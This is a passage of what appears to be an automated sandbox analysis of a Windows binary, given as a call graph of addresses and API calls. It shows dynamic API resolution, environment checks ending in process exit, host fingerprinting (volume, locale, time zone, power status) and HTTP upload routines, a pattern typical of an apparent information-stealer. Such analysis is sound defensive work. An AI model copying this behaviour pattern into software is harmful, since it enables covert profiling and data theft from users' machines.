14076->14077 14078 c445c0 2 API calls 14077->14078 14079 c43be5 14078->14079 14080 c445c0 2 API calls 14079->14080 14081 c43bfe 14080->14081 14082 c445c0 2 API calls 14081->14082 14083 c43c17 14082->14083 14084 c445c0 2 API calls 14083->14084 14085 c43c30 14084->14085 14086 c445c0 2 API calls 14085->14086 14087 c43c49 14086->14087 14088 c445c0 2 API calls 14087->14088 14089 c43c62 14088->14089 14090 c445c0 2 API calls 14089->14090 14091 c43c7b 14090->14091 14092 c445c0 2 API calls 14091->14092 14093 c43c94 14092->14093 14094 c445c0 2 API calls 14093->14094 14095 c43cad 14094->14095 14096 c445c0 2 API calls 14095->14096 14097 c43cc6 14096->14097 14098 c445c0 2 API calls 14097->14098 14099 c43cdf 14098->14099 14100 c445c0 2 API calls 14099->14100 14101 c43cf8 14100->14101 14102 c445c0 2 API calls 14101->14102 14103 c43d11 14102->14103 14104 c445c0 2 API calls 14103->14104 14105 c43d2a 14104->14105 14106 c445c0 2 API calls 14105->14106 14107 c43d43 14106->14107 14108 c445c0 2 API calls 14107->14108 14109 c43d5c 14108->14109 14110 c445c0 2 API calls 14109->14110 14111 c43d75 14110->14111 14112 c445c0 2 API calls 14111->14112 14113 c43d8e 14112->14113 14114 c445c0 2 API calls 14113->14114 14115 c43da7 14114->14115 14116 c445c0 2 API calls 14115->14116 14117 c43dc0 14116->14117 14118 c445c0 2 API calls 14117->14118 14119 c43dd9 14118->14119 14120 c445c0 2 API calls 14119->14120 14121 c43df2 14120->14121 14122 c445c0 2 API calls 14121->14122 14123 c43e0b 14122->14123 14124 c445c0 2 API calls 14123->14124 14125 c43e24 14124->14125 14126 c445c0 2 API calls 14125->14126 14127 c43e3d 14126->14127 14128 c445c0 2 API calls 14127->14128 14129 c43e56 14128->14129 14130 c445c0 2 API calls 14129->14130 14131 c43e6f 14130->14131 14132 c445c0 2 API calls 14131->14132 14133 c43e88 14132->14133 14134 c445c0 2 API calls 14133->14134 14135 c43ea1 14134->14135 14136 c445c0 2 API calls 14135->14136 14137 c43eba 14136->14137 14138 c445c0 2 API calls 14137->14138 14139 c43ed3 14138->14139 
14140 c445c0 2 API calls 14139->14140 14141 c43eec 14140->14141 14142 c445c0 2 API calls 14141->14142 14143 c43f05 14142->14143 14144 c445c0 2 API calls 14143->14144 14145 c43f1e 14144->14145 14146 c445c0 2 API calls 14145->14146 14147 c43f37 14146->14147 14148 c445c0 2 API calls 14147->14148 14149 c43f50 14148->14149 14150 c445c0 2 API calls 14149->14150 14151 c43f69 14150->14151 14152 c445c0 2 API calls 14151->14152 14153 c43f82 14152->14153 14154 c445c0 2 API calls 14153->14154 14155 c43f9b 14154->14155 14156 c445c0 2 API calls 14155->14156 14157 c43fb4 14156->14157 14158 c445c0 2 API calls 14157->14158 14159 c43fcd 14158->14159 14160 c445c0 2 API calls 14159->14160 14161 c43fe6 14160->14161 14162 c445c0 2 API calls 14161->14162 14163 c43fff 14162->14163 14164 c445c0 2 API calls 14163->14164 14165 c44018 14164->14165 14166 c445c0 2 API calls 14165->14166 14167 c44031 14166->14167 14168 c445c0 2 API calls 14167->14168 14169 c4404a 14168->14169 14170 c445c0 2 API calls 14169->14170 14171 c44063 14170->14171 14172 c445c0 2 API calls 14171->14172 14173 c4407c 14172->14173 14174 c445c0 2 API calls 14173->14174 14175 c44095 14174->14175 14176 c445c0 2 API calls 14175->14176 14177 c440ae 14176->14177 14178 c445c0 2 API calls 14177->14178 14179 c440c7 14178->14179 14180 c445c0 2 API calls 14179->14180 14181 c440e0 14180->14181 14182 c445c0 2 API calls 14181->14182 14183 c440f9 14182->14183 14184 c445c0 2 API calls 14183->14184 14185 c44112 14184->14185 14186 c445c0 2 API calls 14185->14186 14187 c4412b 14186->14187 14188 c445c0 2 API calls 14187->14188 14189 c44144 14188->14189 14190 c445c0 2 API calls 14189->14190 14191 c4415d 14190->14191 14192 c445c0 2 API calls 14191->14192 14193 c44176 14192->14193 14194 c445c0 2 API calls 14193->14194 14195 c4418f 14194->14195 14196 c445c0 2 API calls 14195->14196 14197 c441a8 14196->14197 14198 c445c0 2 API calls 14197->14198 14199 c441c1 14198->14199 14200 c445c0 2 API calls 14199->14200 14201 c441da 14200->14201 14202 c445c0 2 
API calls 14201->14202 14203 c441f3 14202->14203 14204 c445c0 2 API calls 14203->14204 14205 c4420c 14204->14205 14206 c445c0 2 API calls 14205->14206 14207 c44225 14206->14207 14208 c445c0 2 API calls 14207->14208 14209 c4423e 14208->14209 14210 c445c0 2 API calls 14209->14210 14211 c44257 14210->14211 14212 c445c0 2 API calls 14211->14212 14213 c44270 14212->14213 14214 c445c0 2 API calls 14213->14214 14215 c44289 14214->14215 14216 c445c0 2 API calls 14215->14216 14217 c442a2 14216->14217 14218 c445c0 2 API calls 14217->14218 14219 c442bb 14218->14219 14220 c445c0 2 API calls 14219->14220 14221 c442d4 14220->14221 14222 c445c0 2 API calls 14221->14222 14223 c442ed 14222->14223 14224 c445c0 2 API calls 14223->14224 14225 c44306 14224->14225 14226 c445c0 2 API calls 14225->14226 14227 c4431f 14226->14227 14228 c445c0 2 API calls 14227->14228 14229 c44338 14228->14229 14230 c445c0 2 API calls 14229->14230 14231 c44351 14230->14231 14232 c445c0 2 API calls 14231->14232 14233 c4436a 14232->14233 14234 c445c0 2 API calls 14233->14234 14235 c44383 14234->14235 14236 c445c0 2 API calls 14235->14236 14237 c4439c 14236->14237 14238 c445c0 2 API calls 14237->14238 14239 c443b5 14238->14239 14240 c445c0 2 API calls 14239->14240 14241 c443ce 14240->14241 14242 c445c0 2 API calls 14241->14242 14243 c443e7 14242->14243 14244 c445c0 2 API calls 14243->14244 14245 c44400 14244->14245 14246 c445c0 2 API calls 14245->14246 14247 c44419 14246->14247 14248 c445c0 2 API calls 14247->14248 14249 c44432 14248->14249 14250 c445c0 2 API calls 14249->14250 14251 c4444b 14250->14251 14252 c445c0 2 API calls 14251->14252 14253 c44464 14252->14253 14254 c445c0 2 API calls 14253->14254 14255 c4447d 14254->14255 14256 c445c0 2 API calls 14255->14256 14257 c44496 14256->14257 14258 c445c0 2 API calls 14257->14258 14259 c444af 14258->14259 14260 c445c0 2 API calls 14259->14260 14261 c444c8 14260->14261 14262 c445c0 2 API calls 14261->14262 14263 c444e1 14262->14263 14264 c445c0 2 API calls 
14263->14264 14265 c444fa 14264->14265 14266 c445c0 2 API calls 14265->14266 14267 c44513 14266->14267 14268 c445c0 2 API calls 14267->14268 14269 c4452c 14268->14269 14270 c445c0 2 API calls 14269->14270 14271 c44545 14270->14271 14272 c445c0 2 API calls 14271->14272 14273 c4455e 14272->14273 14274 c445c0 2 API calls 14273->14274 14275 c44577 14274->14275 14276 c445c0 2 API calls 14275->14276 14277 c44590 14276->14277 14278 c445c0 2 API calls 14277->14278 14279 c445a9 14278->14279 14280 c59c10 14279->14280 14281 c5a036 8 API calls 14280->14281 14282 c59c20 43 API calls 14280->14282 14283 c5a146 14281->14283 14284 c5a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14281->14284 14282->14281 14285 c5a216 14283->14285 14286 c5a153 8 API calls 14283->14286 14284->14283 14287 c5a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14285->14287 14288 c5a298 14285->14288 14286->14285 14287->14288 14289 c5a2a5 6 API calls 14288->14289 14290 c5a337 14288->14290 14289->14290 14291 c5a344 9 API calls 14290->14291 14292 c5a41f 14290->14292 14291->14292 14293 c5a4a2 14292->14293 14294 c5a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14292->14294 14295 c5a4dc 14293->14295 14296 c5a4ab GetProcAddress GetProcAddress 14293->14296 14294->14293 14297 c5a515 14295->14297 14298 c5a4e5 GetProcAddress GetProcAddress 14295->14298 14296->14295 14299 c5a612 14297->14299 14300 c5a522 10 API calls 14297->14300 14298->14297 14301 c5a67d 14299->14301 14302 c5a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14299->14302 14300->14299 14303 c5a686 GetProcAddress 14301->14303 14304 c5a69e 14301->14304 14302->14301 14303->14304 14305 c5a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14304->14305 14306 c55ca3 14304->14306 14305->14306 14307 c41590 14306->14307 15428 c41670 14307->15428 14310 c5a7a0 lstrcpy 14311 c415b5 14310->14311 14312 c5a7a0 lstrcpy 14311->14312 14313 c415c7 
14312->14313 14314 c5a7a0 lstrcpy 14313->14314 14315 c415d9 14314->14315 14316 c5a7a0 lstrcpy 14315->14316 14317 c41663 14316->14317 14318 c55510 14317->14318 14319 c55521 14318->14319 14320 c5a820 2 API calls 14319->14320 14321 c5552e 14320->14321 14322 c5a820 2 API calls 14321->14322 14323 c5553b 14322->14323 14324 c5a820 2 API calls 14323->14324 14325 c55548 14324->14325 14326 c5a740 lstrcpy 14325->14326 14327 c55555 14326->14327 14328 c5a740 lstrcpy 14327->14328 14329 c55562 14328->14329 14330 c5a740 lstrcpy 14329->14330 14331 c5556f 14330->14331 14332 c5a740 lstrcpy 14331->14332 14371 c5557c 14332->14371 14333 c552c0 25 API calls 14333->14371 14334 c551f0 20 API calls 14334->14371 14335 c55643 StrCmpCA 14335->14371 14336 c556a0 StrCmpCA 14337 c557dc 14336->14337 14336->14371 14338 c5a8a0 lstrcpy 14337->14338 14339 c557e8 14338->14339 14341 c5a820 2 API calls 14339->14341 14340 c5a820 lstrlen lstrcpy 14340->14371 14343 c557f6 14341->14343 14342 c55856 StrCmpCA 14344 c55991 14342->14344 14342->14371 14345 c5a820 2 API calls 14343->14345 14347 c5a8a0 lstrcpy 14344->14347 14346 c55805 14345->14346 14348 c41670 lstrcpy 14346->14348 14349 c5599d 14347->14349 14368 c55811 14348->14368 14350 c5a820 2 API calls 14349->14350 14352 c559ab 14350->14352 14351 c55a0b StrCmpCA 14354 c55a16 Sleep 14351->14354 14355 c55a28 14351->14355 14353 c5a820 2 API calls 14352->14353 14358 c559ba 14353->14358 14354->14371 14359 c5a8a0 lstrcpy 14355->14359 14356 c5a740 lstrcpy 14356->14371 14357 c5a7a0 lstrcpy 14357->14371 14360 c41670 lstrcpy 14358->14360 14361 c55a34 14359->14361 14360->14368 14362 c5a820 2 API calls 14361->14362 14363 c55a43 14362->14363 14364 c5a820 2 API calls 14363->14364 14365 c55a52 14364->14365 14367 c41670 lstrcpy 14365->14367 14366 c5578a StrCmpCA 14366->14371 14367->14368 14368->13425 14369 c5593f StrCmpCA 14369->14371 14370 c41590 lstrcpy 14370->14371 14371->14333 14371->14334 14371->14335 14371->14336 14371->14340 14371->14342 14371->14351 14371->14356 
14371->14357 14371->14366 14371->14369 14371->14370 14372 c5a8a0 lstrcpy 14371->14372 14372->14371 14374 c57553 GetVolumeInformationA 14373->14374 14375 c5754c 14373->14375 14376 c57591 14374->14376 14375->14374 14377 c575fc GetProcessHeap RtlAllocateHeap 14376->14377 14378 c57619 14377->14378 14379 c57628 wsprintfA 14377->14379 14380 c5a740 lstrcpy 14378->14380 14381 c5a740 lstrcpy 14379->14381 14382 c55da7 14380->14382 14381->14382 14382->13446 14384 c5a7a0 lstrcpy 14383->14384 14385 c44899 14384->14385 15437 c447b0 14385->15437 14387 c448a5 14388 c5a740 lstrcpy 14387->14388 14389 c448d7 14388->14389 14390 c5a740 lstrcpy 14389->14390 14391 c448e4 14390->14391 14392 c5a740 lstrcpy 14391->14392 14393 c448f1 14392->14393 14394 c5a740 lstrcpy 14393->14394 14395 c448fe 14394->14395 14396 c5a740 lstrcpy 14395->14396 14397 c4490b InternetOpenA StrCmpCA 14396->14397 14398 c44944 14397->14398 14399 c44ecb InternetCloseHandle 14398->14399 15443 c58b60 14398->15443 14401 c44ee8 14399->14401 15458 c49ac0 CryptStringToBinaryA 14401->15458 14402 c44963 15451 c5a920 14402->15451 14405 c44976 14407 c5a8a0 lstrcpy 14405->14407 14412 c4497f 14407->14412 14408 c5a820 2 API calls 14409 c44f05 14408->14409 14411 c5a9b0 4 API calls 14409->14411 14410 c44f27 codecvt 14414 c5a7a0 lstrcpy 14410->14414 14413 c44f1b 14411->14413 14416 c5a9b0 4 API calls 14412->14416 14415 c5a8a0 lstrcpy 14413->14415 14427 c44f57 14414->14427 14415->14410 14417 c449a9 14416->14417 14418 c5a8a0 lstrcpy 14417->14418 14419 c449b2 14418->14419 14420 c5a9b0 4 API calls 14419->14420 14421 c449d1 14420->14421 14422 c5a8a0 lstrcpy 14421->14422 14423 c449da 14422->14423 14424 c5a920 3 API calls 14423->14424 14425 c449f8 14424->14425 14426 c5a8a0 lstrcpy 14425->14426 14428 c44a01 14426->14428 14427->13449 14429 c5a9b0 4 API calls 14428->14429 14430 c44a20 14429->14430 14431 c5a8a0 lstrcpy 14430->14431 14432 c44a29 14431->14432 14433 c5a9b0 4 API calls 14432->14433 14434 c44a48 14433->14434 14435 c5a8a0 lstrcpy 
14434->14435 14436 c44a51 14435->14436 14437 c5a9b0 4 API calls 14436->14437 14438 c44a7d 14437->14438 14439 c5a920 3 API calls 14438->14439 14440 c44a84 14439->14440 14441 c5a8a0 lstrcpy 14440->14441 14442 c44a8d 14441->14442 14443 c44aa3 InternetConnectA 14442->14443 14443->14399 14444 c44ad3 HttpOpenRequestA 14443->14444 14446 c44ebe InternetCloseHandle 14444->14446 14447 c44b28 14444->14447 14446->14399 14448 c5a9b0 4 API calls 14447->14448 14449 c44b3c 14448->14449 14450 c5a8a0 lstrcpy 14449->14450 14451 c44b45 14450->14451 14452 c5a920 3 API calls 14451->14452 14453 c44b63 14452->14453 14454 c5a8a0 lstrcpy 14453->14454 14455 c44b6c 14454->14455 14456 c5a9b0 4 API calls 14455->14456 14457 c44b8b 14456->14457 14458 c5a8a0 lstrcpy 14457->14458 14459 c44b94 14458->14459 14460 c5a9b0 4 API calls 14459->14460 14461 c44bb5 14460->14461 14462 c5a8a0 lstrcpy 14461->14462 14463 c44bbe 14462->14463 14464 c5a9b0 4 API calls 14463->14464 14465 c44bde 14464->14465 14466 c5a8a0 lstrcpy 14465->14466 14467 c44be7 14466->14467 14468 c5a9b0 4 API calls 14467->14468 14469 c44c06 14468->14469 14470 c5a8a0 lstrcpy 14469->14470 14471 c44c0f 14470->14471 14472 c5a920 3 API calls 14471->14472 14473 c44c2d 14472->14473 14474 c5a8a0 lstrcpy 14473->14474 14475 c44c36 14474->14475 14476 c5a9b0 4 API calls 14475->14476 14477 c44c55 14476->14477 14478 c5a8a0 lstrcpy 14477->14478 14479 c44c5e 14478->14479 14480 c5a9b0 4 API calls 14479->14480 14481 c44c7d 14480->14481 14482 c5a8a0 lstrcpy 14481->14482 14483 c44c86 14482->14483 14484 c5a920 3 API calls 14483->14484 14485 c44ca4 14484->14485 14486 c5a8a0 lstrcpy 14485->14486 14487 c44cad 14486->14487 14488 c5a9b0 4 API calls 14487->14488 14489 c44ccc 14488->14489 14490 c5a8a0 lstrcpy 14489->14490 14491 c44cd5 14490->14491 14492 c5a9b0 4 API calls 14491->14492 14493 c44cf6 14492->14493 14494 c5a8a0 lstrcpy 14493->14494 14495 c44cff 14494->14495 14496 c5a9b0 4 API calls 14495->14496 14497 c44d1f 14496->14497 14498 c5a8a0 lstrcpy 14497->14498 
14499 c44d28 14498->14499 14500 c5a9b0 4 API calls 14499->14500 14501 c44d47 14500->14501 14502 c5a8a0 lstrcpy 14501->14502 14503 c44d50 14502->14503 14504 c5a920 3 API calls 14503->14504 14505 c44d6e 14504->14505 14506 c5a8a0 lstrcpy 14505->14506 14507 c44d77 14506->14507 14508 c5a740 lstrcpy 14507->14508 14509 c44d92 14508->14509 14510 c5a920 3 API calls 14509->14510 14511 c44db3 14510->14511 14512 c5a920 3 API calls 14511->14512 14513 c44dba 14512->14513 14514 c5a8a0 lstrcpy 14513->14514 14515 c44dc6 14514->14515 14516 c44de7 lstrlen 14515->14516 14517 c44dfa 14516->14517 14518 c44e03 lstrlen 14517->14518 15457 c5aad0 14518->15457 14520 c44e13 HttpSendRequestA 14521 c44e32 InternetReadFile 14520->14521 14522 c44e67 InternetCloseHandle 14521->14522 14527 c44e5e 14521->14527 14524 c5a800 14522->14524 14524->14446 14525 c5a9b0 4 API calls 14525->14527 14526 c5a8a0 lstrcpy 14526->14527 14527->14521 14527->14522 14527->14525 14527->14526 15464 c5aad0 14528->15464 14530 c517c4 StrCmpCA 14531 c517cf ExitProcess 14530->14531 14543 c517d7 14530->14543 14532 c519c2 14532->13451 14533 c518ad StrCmpCA 14533->14543 14534 c518cf StrCmpCA 14534->14543 14535 c518f1 StrCmpCA 14535->14543 14536 c51951 StrCmpCA 14536->14543 14537 c51970 StrCmpCA 14537->14543 14538 c51913 StrCmpCA 14538->14543 14539 c51932 StrCmpCA 14539->14543 14540 c5185d StrCmpCA 14540->14543 14541 c5187f StrCmpCA 14541->14543 14542 c5a820 lstrlen lstrcpy 14542->14543 14543->14532 14543->14533 14543->14534 14543->14535 14543->14536 14543->14537 14543->14538 14543->14539 14543->14540 14543->14541 14543->14542 14545 c5a7a0 lstrcpy 14544->14545 14546 c45979 14545->14546 14547 c447b0 2 API calls 14546->14547 14548 c45985 14547->14548 14549 c5a740 lstrcpy 14548->14549 14550 c459ba 14549->14550 14551 c5a740 lstrcpy 14550->14551 14552 c459c7 14551->14552 14553 c5a740 lstrcpy 14552->14553 14554 c459d4 14553->14554 14555 c5a740 lstrcpy 14554->14555 14556 c459e1 14555->14556 14557 c5a740 lstrcpy 14556->14557 14558 c459ee 
InternetOpenA StrCmpCA 14557->14558 14559 c45a1d 14558->14559 14560 c45fc3 InternetCloseHandle 14559->14560 14561 c58b60 3 API calls 14559->14561 14562 c45fe0 14560->14562 14563 c45a3c 14561->14563 14565 c49ac0 4 API calls 14562->14565 14564 c5a920 3 API calls 14563->14564 14566 c45a4f 14564->14566 14567 c45fe6 14565->14567 14568 c5a8a0 lstrcpy 14566->14568 14569 c5a820 2 API calls 14567->14569 14572 c4601f codecvt 14567->14572 14574 c45a58 14568->14574 14570 c45ffd 14569->14570 14571 c5a9b0 4 API calls 14570->14571 14573 c46013 14571->14573 14576 c5a7a0 lstrcpy 14572->14576 14575 c5a8a0 lstrcpy 14573->14575 14577 c5a9b0 4 API calls 14574->14577 14575->14572 14585 c4604f 14576->14585 14578 c45a82 14577->14578 14579 c5a8a0 lstrcpy 14578->14579 14580 c45a8b 14579->14580 14581 c5a9b0 4 API calls 14580->14581 14582 c45aaa 14581->14582 14583 c5a8a0 lstrcpy 14582->14583 14584 c45ab3 14583->14584 14586 c5a920 3 API calls 14584->14586 14585->13457 14587 c45ad1 14586->14587 14588 c5a8a0 lstrcpy 14587->14588 14589 c45ada 14588->14589 14590 c5a9b0 4 API calls 14589->14590 14591 c45af9 14590->14591 14592 c5a8a0 lstrcpy 14591->14592 14593 c45b02 14592->14593 14594 c5a9b0 4 API calls 14593->14594 14595 c45b21 14594->14595 14596 c5a8a0 lstrcpy 14595->14596 14597 c45b2a 14596->14597 14598 c5a9b0 4 API calls 14597->14598 14599 c45b56 14598->14599 14600 c5a920 3 API calls 14599->14600 14601 c45b5d 14600->14601 14602 c5a8a0 lstrcpy 14601->14602 14603 c45b66 14602->14603 14604 c45b7c InternetConnectA 14603->14604 14604->14560 14605 c45bac HttpOpenRequestA 14604->14605 14607 c45fb6 InternetCloseHandle 14605->14607 14608 c45c0b 14605->14608 14607->14560 14609 c5a9b0 4 API calls 14608->14609 14610 c45c1f 14609->14610 14611 c5a8a0 lstrcpy 14610->14611 14612 c45c28 14611->14612 14613 c5a920 3 API calls 14612->14613 14614 c45c46 14613->14614 14615 c5a8a0 lstrcpy 14614->14615 14616 c45c4f 14615->14616 14617 c5a9b0 4 API calls 14616->14617 14618 c45c6e 14617->14618 14619 c5a8a0 lstrcpy 
14618->14619 14620 c45c77 14619->14620 14621 c5a9b0 4 API calls 14620->14621 14622 c45c98 14621->14622 14623 c5a8a0 lstrcpy 14622->14623 14624 c45ca1 14623->14624 14625 c5a9b0 4 API calls 14624->14625 14626 c45cc1 14625->14626 14627 c5a8a0 lstrcpy 14626->14627 14628 c45cca 14627->14628 14629 c5a9b0 4 API calls 14628->14629 14630 c45ce9 14629->14630 14631 c5a8a0 lstrcpy 14630->14631 14632 c45cf2 14631->14632 14633 c5a920 3 API calls 14632->14633 14634 c45d10 14633->14634 14635 c5a8a0 lstrcpy 14634->14635 14636 c45d19 14635->14636 14637 c5a9b0 4 API calls 14636->14637 14638 c45d38 14637->14638 14639 c5a8a0 lstrcpy 14638->14639 14640 c45d41 14639->14640 14641 c5a9b0 4 API calls 14640->14641 14642 c45d60 14641->14642 14643 c5a8a0 lstrcpy 14642->14643 14644 c45d69 14643->14644 14645 c5a920 3 API calls 14644->14645 14646 c45d87 14645->14646 14647 c5a8a0 lstrcpy 14646->14647 14648 c45d90 14647->14648 14649 c5a9b0 4 API calls 14648->14649 14650 c45daf 14649->14650 14651 c5a8a0 lstrcpy 14650->14651 14652 c45db8 14651->14652 14653 c5a9b0 4 API calls 14652->14653 14654 c45dd9 14653->14654 14655 c5a8a0 lstrcpy 14654->14655 14656 c45de2 14655->14656 14657 c5a9b0 4 API calls 14656->14657 14658 c45e02 14657->14658 14659 c5a8a0 lstrcpy 14658->14659 14660 c45e0b 14659->14660 14661 c5a9b0 4 API calls 14660->14661 14662 c45e2a 14661->14662 14663 c5a8a0 lstrcpy 14662->14663 14664 c45e33 14663->14664 14665 c5a920 3 API calls 14664->14665 14666 c45e54 14665->14666 14667 c5a8a0 lstrcpy 14666->14667 14668 c45e5d 14667->14668 14669 c45e70 lstrlen 14668->14669 15465 c5aad0 14669->15465 14671 c45e81 lstrlen GetProcessHeap RtlAllocateHeap 15466 c5aad0 14671->15466 14673 c45eae lstrlen 14674 c45ebe 14673->14674 14675 c45ed7 lstrlen 14674->14675 14676 c45ee7 14675->14676 14677 c45ef0 lstrlen 14676->14677 14678 c45f03 14677->14678 14679 c45f1a lstrlen 14678->14679 15467 c5aad0 14679->15467 14681 c45f2a HttpSendRequestA 14682 c45f35 InternetReadFile 14681->14682 14683 c45f6a InternetCloseHandle 
14682->14683 14687 c45f61 14682->14687 14683->14607 14685 c5a9b0 4 API calls 14685->14687 14686 c5a8a0 lstrcpy 14686->14687 14687->14682 14687->14683 14687->14685 14687->14686 14690 c51077 14688->14690 14689 c51151 14689->13459 14690->14689 14691 c5a820 lstrlen lstrcpy 14690->14691 14691->14690 14697 c50db7 14692->14697 14693 c50f17 14693->13467 14694 c50ea4 StrCmpCA 14694->14697 14695 c50e27 StrCmpCA 14695->14697 14696 c50e67 StrCmpCA 14696->14697 14697->14693 14697->14694 14697->14695 14697->14696 14698 c5a820 lstrlen lstrcpy 14697->14698 14698->14697 14701 c50f67 14699->14701 14700 c51044 14700->13475 14701->14700 14702 c50fb2 StrCmpCA 14701->14702 14703 c5a820 lstrlen lstrcpy 14701->14703 14702->14701 14703->14701 14705 c5a740 lstrcpy 14704->14705 14706 c51a26 14705->14706 14707 c5a9b0 4 API calls 14706->14707 14708 c51a37 14707->14708 14709 c5a8a0 lstrcpy 14708->14709 14710 c51a40 14709->14710 14711 c5a9b0 4 API calls 14710->14711 14712 c51a5b 14711->14712 14713 c5a8a0 lstrcpy 14712->14713 14714 c51a64 14713->14714 14715 c5a9b0 4 API calls 14714->14715 14716 c51a7d 14715->14716 14717 c5a8a0 lstrcpy 14716->14717 14718 c51a86 14717->14718 14719 c5a9b0 4 API calls 14718->14719 14720 c51aa1 14719->14720 14721 c5a8a0 lstrcpy 14720->14721 14722 c51aaa 14721->14722 14723 c5a9b0 4 API calls 14722->14723 14724 c51ac3 14723->14724 14725 c5a8a0 lstrcpy 14724->14725 14726 c51acc 14725->14726 14727 c5a9b0 4 API calls 14726->14727 14728 c51ae7 14727->14728 14729 c5a8a0 lstrcpy 14728->14729 14730 c51af0 14729->14730 14731 c5a9b0 4 API calls 14730->14731 14732 c51b09 14731->14732 14733 c5a8a0 lstrcpy 14732->14733 14734 c51b12 14733->14734 14735 c5a9b0 4 API calls 14734->14735 14736 c51b2d 14735->14736 14737 c5a8a0 lstrcpy 14736->14737 14738 c51b36 14737->14738 14739 c5a9b0 4 API calls 14738->14739 14740 c51b4f 14739->14740 14741 c5a8a0 lstrcpy 14740->14741 14742 c51b58 14741->14742 14743 c5a9b0 4 API calls 14742->14743 14744 c51b76 14743->14744 14745 c5a8a0 lstrcpy 
14744->14745 14746 c51b7f 14745->14746 14747 c57500 6 API calls 14746->14747 14748 c51b96 14747->14748 14749 c5a920 3 API calls 14748->14749 14750 c51ba9 14749->14750 14751 c5a8a0 lstrcpy 14750->14751 14752 c51bb2 14751->14752 14753 c5a9b0 4 API calls 14752->14753 14754 c51bdc 14753->14754 14755 c5a8a0 lstrcpy 14754->14755 14756 c51be5 14755->14756 14757 c5a9b0 4 API calls 14756->14757 14758 c51c05 14757->14758 14759 c5a8a0 lstrcpy 14758->14759 14760 c51c0e 14759->14760 15468 c57690 GetProcessHeap RtlAllocateHeap 14760->15468 14763 c5a9b0 4 API calls 14764 c51c2e 14763->14764 14765 c5a8a0 lstrcpy 14764->14765 14766 c51c37 14765->14766 14767 c5a9b0 4 API calls 14766->14767 14768 c51c56 14767->14768 14769 c5a8a0 lstrcpy 14768->14769 14770 c51c5f 14769->14770 14771 c5a9b0 4 API calls 14770->14771 14772 c51c80 14771->14772 14773 c5a8a0 lstrcpy 14772->14773 14774 c51c89 14773->14774 15475 c577c0 GetCurrentProcess IsWow64Process 14774->15475 14777 c5a9b0 4 API calls 14778 c51ca9 14777->14778 14779 c5a8a0 lstrcpy 14778->14779 14780 c51cb2 14779->14780 14781 c5a9b0 4 API calls 14780->14781 14782 c51cd1 14781->14782 14783 c5a8a0 lstrcpy 14782->14783 14784 c51cda 14783->14784 14785 c5a9b0 4 API calls 14784->14785 14786 c51cfb 14785->14786 14787 c5a8a0 lstrcpy 14786->14787 14788 c51d04 14787->14788 14789 c57850 3 API calls 14788->14789 14790 c51d14 14789->14790 14791 c5a9b0 4 API calls 14790->14791 14792 c51d24 14791->14792 14793 c5a8a0 lstrcpy 14792->14793 14794 c51d2d 14793->14794 14795 c5a9b0 4 API calls 14794->14795 14796 c51d4c 14795->14796 14797 c5a8a0 lstrcpy 14796->14797 14798 c51d55 14797->14798 14799 c5a9b0 4 API calls 14798->14799 14800 c51d75 14799->14800 14801 c5a8a0 lstrcpy 14800->14801 14802 c51d7e 14801->14802 14803 c578e0 3 API calls 14802->14803 14804 c51d8e 14803->14804 14805 c5a9b0 4 API calls 14804->14805 14806 c51d9e 14805->14806 14807 c5a8a0 lstrcpy 14806->14807 14808 c51da7 14807->14808 14809 c5a9b0 4 API calls 14808->14809 14810 c51dc6 14809->14810 
14811 c5a8a0 lstrcpy 14810->14811 14812 c51dcf 14811->14812 14813 c5a9b0 4 API calls 14812->14813 14814 c51df0 14813->14814 14815 c5a8a0 lstrcpy 14814->14815 14816 c51df9 14815->14816 15477 c57980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14816->15477 14819 c5a9b0 4 API calls 14820 c51e19 14819->14820 14821 c5a8a0 lstrcpy 14820->14821 14822 c51e22 14821->14822 14823 c5a9b0 4 API calls 14822->14823 14824 c51e41 14823->14824 14825 c5a8a0 lstrcpy 14824->14825 14826 c51e4a 14825->14826 14827 c5a9b0 4 API calls 14826->14827 14828 c51e6b 14827->14828 14829 c5a8a0 lstrcpy 14828->14829 14830 c51e74 14829->14830 15479 c57a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14830->15479 14833 c5a9b0 4 API calls 14834 c51e94 14833->14834 14835 c5a8a0 lstrcpy 14834->14835 14836 c51e9d 14835->14836 14837 c5a9b0 4 API calls 14836->14837 14838 c51ebc 14837->14838 14839 c5a8a0 lstrcpy 14838->14839 14840 c51ec5 14839->14840 14841 c5a9b0 4 API calls 14840->14841 14842 c51ee5 14841->14842 14843 c5a8a0 lstrcpy 14842->14843 14844 c51eee 14843->14844 15482 c57b00 GetUserDefaultLocaleName 14844->15482 14847 c5a9b0 4 API calls 14848 c51f0e 14847->14848 14849 c5a8a0 lstrcpy 14848->14849 14850 c51f17 14849->14850 14851 c5a9b0 4 API calls 14850->14851 14852 c51f36 14851->14852 14853 c5a8a0 lstrcpy 14852->14853 14854 c51f3f 14853->14854 14855 c5a9b0 4 API calls 14854->14855 14856 c51f60 14855->14856 14857 c5a8a0 lstrcpy 14856->14857 14858 c51f69 14857->14858 15486 c57b90 14858->15486 14860 c51f80 14861 c5a920 3 API calls 14860->14861 14862 c51f93 14861->14862 14863 c5a8a0 lstrcpy 14862->14863 14864 c51f9c 14863->14864 14865 c5a9b0 4 API calls 14864->14865 14866 c51fc6 14865->14866 14867 c5a8a0 lstrcpy 14866->14867 14868 c51fcf 14867->14868 14869 c5a9b0 4 API calls 14868->14869 14870 c51fef 14869->14870 14871 c5a8a0 lstrcpy 14870->14871 14872 c51ff8 14871->14872 15498 c57d80 GetSystemPowerStatus 14872->15498 14875 c5a9b0 4 API calls 14876 c52018 14875->14876 14877 c5a8a0 
